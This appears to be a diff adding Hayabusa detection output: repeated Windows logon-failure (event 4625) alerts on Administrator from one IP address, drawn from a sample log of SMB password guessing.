+2016-09-20 01:50:36.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tAVRBfMxIyrfsEtR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wuCIClZihRxRyjGF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yxhpEP6nnmihvkHB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J1HYmJDrWmKjj8DF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V81dIfR2SRNDk3a2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vaZpLaxB1kcCXqHP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.949 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JRhs8IoV6R6vyCdL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4wUYds3Ym3G2abrV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tmBfxm6pPLlSEsUI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VbAuqFggx0zz5iEn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8cytpVOjb4KrNaGg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BFFFt7eFzmlzbHhG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AJQBZZiNKVGXzx4A  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7gyu6EyrtbyowTfC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.267 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aASpkRuPfE8Nl64n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MSI2b7LpZpWO3xJW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: avNkOq3fsGN3yYJi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Wnlgy6dW33tRk6UX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: msJ8QrqMluTeUlM9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H33NuKduMuskxL0D  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2BHjp69CD1ttbaK2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5uxByLPApvfeIhU2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6g0WOAnoGpKyEyzW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.640 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: P8MTs4Nkbm3ryqcp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0Nyd7tr3y0BHmPLM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.731 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J5KiDQOEnDf6xEPN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3MBP1buuRcBRiQTG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DXXdcg3MSqnGSvax  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Kej7zgIDCNR5tnnp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gjM8SOeQXwytB6iw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XPNATM0IL05vtbZ1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H56ci5gbBVzebS2j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6rRofLg1uxrojU7n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MAhtwTU8OttAhcxf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CwKgAR6OWbkFlxUy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lNZR4G0DVsXVg4A9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OZG99tl0RRN3cQoK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nwRzAutxa07Y1xE4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OwhvrVBSRa8RcCKe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bLBwBys2favoK7BQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3oYpj1rGcsOWNSs7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IBogtzE6No62tJB9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QQJICDi3T4LiwXZc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hnlKkfHYT0ID3BWr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.510 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gw36XaWrYp2M9CZd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j9aT76CAAER0H98I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TEOZfrP3IYmutAuq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zd54DAwwp0BJhhaZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AR6Gc128RlPtwcPl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cpjS1YZy2sSRqzI3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EKeate89Gw1oEp0U  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tBhApsBYa65Hxr0L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.894 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ITv5RS3WHhWe0Hez  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WASvcAp9zfU3uSka  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H1f6szOactEp5ntF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Loe5RkT9Ki0Aw2Lv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TJdVtE7dNSoyM3LI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QlAtU1mIO7m5DnuP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wAK2rh94yKwiH2Nw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AuqsvmUbPlpWFBRZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BShEB6VnXkOxwtFB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AjAc5QMvpTBsDziO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Fwwp5CD20dR8QrIo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tL6GzVzndZL7DZMN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.371 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zK5IpESvDA2DexwL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qvTyabCyGaxscOrN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FW8VghddPwP5C6dO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xGZuyZ0LErZ3Sgty  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.515 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bT1xrvfndr5R8Vg3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H6RFTZVJE9remzqs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.599 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pzjwzORvTwuBPLEs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UMjSFfZ88BV2sT1F  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
